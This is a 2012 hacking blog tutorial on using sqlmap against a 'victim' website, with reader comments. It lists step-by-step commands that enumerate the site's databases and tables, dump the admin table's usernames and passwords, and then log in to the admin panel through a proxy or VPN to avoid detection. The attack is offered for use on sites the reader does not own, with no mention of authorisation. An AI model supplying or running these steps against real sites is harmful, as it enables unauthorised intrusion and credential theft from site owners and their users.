Now you all can invite me on skype for any kind of help required as my username is krackoworld


18 October 2012

Pin It

How to Hack Websites via SQL Map?


sqlmap Hi friends How are you? I hope all are fine and Today by managing some time, I am going to tell you the procedure of Website Hacking using SQL Map. So first lets start with its definition. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers properly. Now to start with this tutorial all you need is 3 things as mentioned below.

1. Backtrack 5

2. Vulnerable Website

3. Little bit Mind

Procedure for Hacking Websites using SQL Map 2012

1. First of all Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. ( In this case, I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter. (refer above figure)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs


4. Now you will get the database name of the website

sql map 3

Well I got the two database aj and information_schema we will select aj database.
5. Now get the tables of that database. For that you need to enter this command into your terminal and simply press Enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command below and hit enter.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

sql map 4

7. Now you will get the tables list which is stored in aj database.
sql map 5

8. Just grab the columns from the admin table and

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

sql map 7

Now we got the columns and we got username and password too
9. Here we will grab the passwords of the admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we got the username and the password of the website !
sql map 9

Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

10. That's it! Enjoy hacking.

Any Comments are Welcomed Below…



Respected Readers :-
As a 18 years old student, running the top most blog in today's world is something quite difficult to do or handle as we bring the best things available related to ethical hacking and security tips to our readers every day. To keep us strong with this attitude, a small contribution from your side will highly be appreciated.

 

E njoyed this post very much – So why not you Subscribe to our regular Email Updates ! and stay connected with us forever .  

Kindly Bookmark and Share it with your friends :

2 comments :

  1. AwesUMM...!!
    IT worksss...100 %%% :)))
    thanks

    ReplyDelete
  2. Hello, i would like to ask that what is the benefits of sql training, what all topics should be covered and it is kinda bothering me … and has anyone studies from this course http://www.wiziq.com/course/125-comprehensive-introduction-to-sql of SQL tutorial online?? or tell me any other guidance...
    would really appreciate help… and Also i would like to thank for all the information you are providing on sql training.

    ReplyDelete

Your feedback is always Precious to us.
I will try to answer all the queries as soon as possible.

Regards
karan chauhan

 

Recent Posts

Recent Comments

| KrackoWorld (KoW) © 2014. All Rights Reserved | Style By All Web Designing | | Contact |